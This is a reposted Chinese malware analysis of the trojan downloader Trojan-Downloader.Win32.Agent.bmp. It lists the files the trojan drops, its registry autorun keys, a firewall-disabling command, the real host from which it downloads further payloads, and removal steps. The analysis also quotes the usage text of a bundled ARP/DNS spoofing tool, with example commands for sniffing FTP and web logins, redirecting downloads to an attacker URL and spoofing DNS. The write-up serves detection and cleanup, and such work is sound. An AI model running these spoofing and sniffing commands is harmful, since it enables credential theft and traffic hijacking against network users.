偶像小宝写的:http://hi.baidu.com/tane/blog/item/f3dc83d68fbcbc2d06088b79.html
Trojan-Downloader.Win32.Agent.bmp分析
安天CERT:高喜宝
一、 病毒标签:
病毒名称: Trojan-Downloader.Win32.Agent.bmp
病毒类型: 木马
文件 MD5: E2C32E4E0CD6205C4654C98C152EAB6E
公开范围: 完全公开
危害等级: 5
文件长度: 45,233 字节
感染系统: windows98以上版本
开发工具: Borland Delphi 6.0 - 7.0
加壳类型: FSG 2.0
二、 病毒描述:
该病毒属木马类,病毒运行后衍生病毒文件到系统目录下,并删除自身;修改注册表,添加启动项,以达到随机启动的目的;修改系统时间为2002年3月3日19点02分;感染htm/asp/php文件,在文件尾部插入代码;遍历盘符,在指定路径下创建文本文件,以记录相关信息;指定注册表启动项,但未全部执行;连接网络,下载大量病毒文件到本机运行,该病毒下载的文件可引起DNS欺骗。
三、 行为分析:
1、病毒运行后衍生病毒文件到系统目录下,并删除自身:
%system32%softmuma.exe
2、修改注册表,添加启动项,以达到随机启动的目的:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "Mick"="C:WINDOWSsystem32softmuma.exe"
3、修改系统时间为:
2002年3月3日19点02分
4、感染htm/asp/php文件,在文件尾部插入以下代码:
5、遍历盘符,在指定路径下创建文本文件,以记录相关信息:
"c:/"
"C:Program FilesNetMeetingc.txt"
"d:/"
"C:Program FilesNetMeetingd.txt"
"e:/"
"C:Program FilesNetMeetinge.txt"
"f:/"
"C:Program FilesNetMeetingf.txt"
"g:/"
"C:Program FilesNetMeetingg.txt"
6、关闭系统防火墙服务,以降低系统安全性能:
在后台打开cmd 用命令c net stop sharedaccess关闭系统防火墙服务
7、指定注册表启动项,但未全部执行:
"SoftwareMicrosoftWindowsCurrentVersionRun"
"c:windows1.exe"
"c:windows2.exe"
"c:windows3.exe"
"c:windows4.exe"
"c:windows5.exe"
"c:windows6.exe"
"c:windows7.exe"
"c:windows8.exe"
"c:windows9.exe"
"c:windows10.exe"
"c:windows11.exe"
"c:windows12.exe"
"c:windows13.exe"
"c:windows14.exe"
"c:windows15.exe"
"c:windows16.exe"
8、连接网络,下载病毒文件到本机运行:
IP:59.34.198.33(广东省湛江市 电信)
域名:0001.0168168.cn
下载地址:0001.0168168.cn/1.exe
0001.0168168.cn/*.*
下载的病毒运行后衍生的文件:
%WINDIR%11.exe
%WINDIR%13.exe
%WINDIR%winform.exe
%system32%dh2104.dll
%system32%moyu103.dll
%system32%msfeed.exe
%system32%mydata.exe
%system32% wizdh.exe
%system32% wizqjsj.dll
%system32% wizqjsj.exe
%system32% wizzhuxians.dll
%system32% wizzhuxians.exe
%system32%packet.dll
%system32% avasktao.dll
%system32% avasktao.exe
%system32%sevices.exe
%system32%softmuma.exe
%system32%visin.exe
%system32%wanpacket.dll
%system32%winform.dll
%system32%wpcap.dll
%system32%ztinetzt.dll
%system32%ztinetzt.exe
%system32%drivers pf.sys
%system32%driversusbinte.sys
%Program Files%Internet ExplorerPLUGINSSystem64.Sys
%Temp% xso.exe
%Temp% lso.exe
%Temp%wgso.exe
%Temp%wlso.exe
%Temp%woso.exe
9、下载的病毒增加的注册表启动项:
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{754FB7D8-B8FE-4810-B363-A788CD060F1F}InProcServer32
键值: 字串: "@"="C:Program FilesInternet ExplorerPLUGINSSystem64.Sys"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{11716107-A10D-11cf-64CD-11115FE1CF41}
键值: 字串: "StubPath"="C:WINDOWSsystem32 wizzhuxians.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{6A202101-A04D-21cf-65CD-31FF5FE1CF20}
键值: 字串: "StubPath"="C:WINDOWSsystem32mydata.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun
键值: 字串: "visin"="C:WINDOWSsystem32visin.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: " Microsoft Autorun1"="C:WINDOWSsystem32 wizdh.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: " Microsoft Autorun14"="C:WINDOWSsystem32ztinetzt.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "Microsoft Autorun7"="C:WINDOWSsystem32 wizqjsj.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "Microsoft Autorun9"="C:WINDOWSsystem32Ravasktao.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "rxsa"="C:DOCUME~1COMMAN~1LOCALS~1Temp xso.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "tlsa"="C:DOCUME~1COMMAN~1LOCALS~1Temp lso.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "wgsa"="C:DOCUME~1COMMAN~1LOCALS~1Tempwgso.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "WinForm"="C:WINDOWSWinForm.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "wlsa"="C:DOCUME~1COMMAN~1LOCALS~1Tempwlso.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "wosa"="C:DOCUME~1COMMAN~1LOCALS~1Tempwoso.exe"
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesNPF
键值: 字串: "ImagePath"="system32drivers pf.sys"
10、该病毒下载的病毒可引起DNS欺骗:
Content-Encoding: Transfer-Encoding: Content-Type: text/htmlHTTP/1.0 200HTTP/1.1 200DNS欺骗(修改应答包) %s -> %d.%d.%d.%d
DNS欺骗(构建应答包) %s -> %d.%d.%d.%d
pmac == NULL ??????
%d.%d.%d.%d -> %d.%d.%d.%d
[!] ProcessPacket -> send packet error. %d
[!] Forward thread send packet error
memory lack.
Scanning Alive Host......
%d: %15s %.2X-%.2X-%.2X-%.2X-%.2X-%.2X %s
Found Alive Host:
N/A[-] Get %s mac Error.
No interfaces found! Make sure WinPcap is installed.
Default Gateway . . : %s
Physical Address. . : %.2X-%.2X-%.2X-%.2X-%.2X-%.2X
%d. %s
IP Address. . . . . : %s
Error in pcap_findalldevs: %s
[*] Bind on %s %s...
Unable to open the adapter.%s is not supported by WinPcap
Bye!
Restoring the ARPTable......
Killing the SpoofThread......
Ctrl+C Is Pressed.
options:
-idx [index] 网卡索引号
-ip [ip] 欺骗的IP,用'-'指定范围,','隔开
-sethost [ip] 默认是网关,可以指定别的IP
-port [port] 关注的端口,用'-'指定范围,','隔开,没指定默认关注所有端口
-reset 恢复目标机的ARP表
-hostname 探测主机时获取主机名信息
-logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字,
','隔开关键字,多个条件'|'隔开
所有带+前缀的关键字都出现的包则写入文件
带-前缀的关键字出现的包不写入文件
带_前缀的关键字一个符合则写入文件(如有+-条件也要符合)
-save_a [filename] 将捕捉到的数据写入文件 ACSII模式
-save_h [filename] HEX模式
-hacksite [ip] 指定要插入代码的站点域名或IP,
多个可用','隔开,没指定则影响所有站点
-insert [html code]指定要插入html代码
-postfix [string] 关注的后缀名,只关注HTTP/1.1 302
-hackURL [url] 发现关注的后缀名后修改URL到新的URL
-filename [name] 新URL上有效的资源文件名
-hackdns [string] DNS欺骗,只修改UDP的报文,多个可用','隔开
格式: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1
-Interval [ms] 定时欺骗的时间间隔,单位:毫秒:默认是3000 ms
-spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者(默认)
-speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB
example:
嗅探指定的IP段中端口80的数据,并以HEX模式写入文件
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log
FTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件
zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -
save_a sniff.log
HTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -
save_a sniff.log
用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探
zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS"
-save_a sniff.log
如果嗅探到目标下载文件后缀是exe等则更改Location:为http://xx.net/test.exe
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -
postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe
指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite
222.2.2.2,www.a.com,www.b.com -insert "just for fun"
指定的IP段中的用户访问的所有网站都插入一个框架代码
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert ""
指定的两个IP的总带宽限制到20KB
zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20
DNS欺骗
zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns
"www.aa.com|222.22.2.2,www.bb.com|1.1.1.1"
注:% System%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:WinntSystem32,windows95/98/me中默认的安装路径是C:WindowsSystem,windowsXP中默认的安装路径是C:WindowsSystem32。
四、 清除方案:
1、使用安天木马防线可彻底清除此病毒(推荐)。
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1) 使用安天木马防线“进程管理”关闭病毒进程
(2) 删除病毒文件
%system32%softmuma.exe
%WINDIR%11.exe
%WINDIR%13.exe
%WINDIR%winform.exe
%system32%dh2104.dll
%system32%moyu103.dll
%system32%msfeed.exe
%system32%mydata.exe
%system32% wizdh.exe
%system32% wizqjsj.dll
%system32% wizqjsj.exe
%system32% wizzhuxians.dll
%system32% wizzhuxians.exe
%system32%packet.dll
%system32% avasktao.dll
%system32% avasktao.exe
%system32%sevices.exe
%system32%softmuma.exe
%system32%visin.exe
%system32%wanpacket.dll
%system32%winform.dll
%system32%wpcap.dll
%system32%ztinetzt.dll
%system32%ztinetzt.exe
%system32%drivers pf.sys
%system32%driversusbinte.sys
%Program Files%Internet ExplorerPLUGINSSystem64.Sys
%Temp% xso.exe
%Temp% lso.exe
%Temp%wgso.exe
%Temp%wlso.exe
%Temp%woso.exe
(3) 恢复病毒修改的注册表项目,删除病毒添加的注册表项
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "Mick"="C:WINDOWSsystem32softmuma.exe"
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{754FB7D8-B8FE-4810-B363-A788CD060F1F}InProcServer32
键值: 字串: "@"="C:Program FilesInternet ExplorerPLUGINSSystem64.Sys"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{11716107-A10D-11cf-64CD-11115FE1CF41}
键值: 字串: "StubPath"="C:WINDOWSsystem32 wizzhuxians.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{6A202101-A04D-21cf-65CD-31FF5FE1CF20}
键值: 字串: "StubPath"="C:WINDOWSsystem32mydata.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun
键值: 字串: "visin"="C:WINDOWSsystem32visin.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: " Microsoft Autorun1"="C:WINDOWSsystem32 wizdh.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: " Microsoft Autorun14"="C:WINDOWSsystem32ztinetzt.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "Microsoft Autorun7"="C:WINDOWSsystem32 wizqjsj.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "Microsoft Autorun9"="C:WINDOWSsystem32Ravasktao.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "rxsa"="C:DOCUME~1COMMAN~1LOCALS~1Temp xso.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "tlsa"="C:DOCUME~1COMMAN~1LOCALS~1Temp lso.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "wgsa"="C:DOCUME~1COMMAN~1LOCALS~1Tempwgso.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "WinForm"="C:WINDOWSWinForm.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "wlsa"="C:DOCUME~1COMMAN~1LOCALS~1Tempwlso.exe"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键值: 字串: "wosa"="C:DOCUME~1COMMAN~1LOCALS~1Tempwoso.exe"
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesNPF
键值: 字串: "ImagePath"="system32drivers pf.sys"
转来好好学习一下:)
0
0
已为社区贡献1条内容
所有评论(0)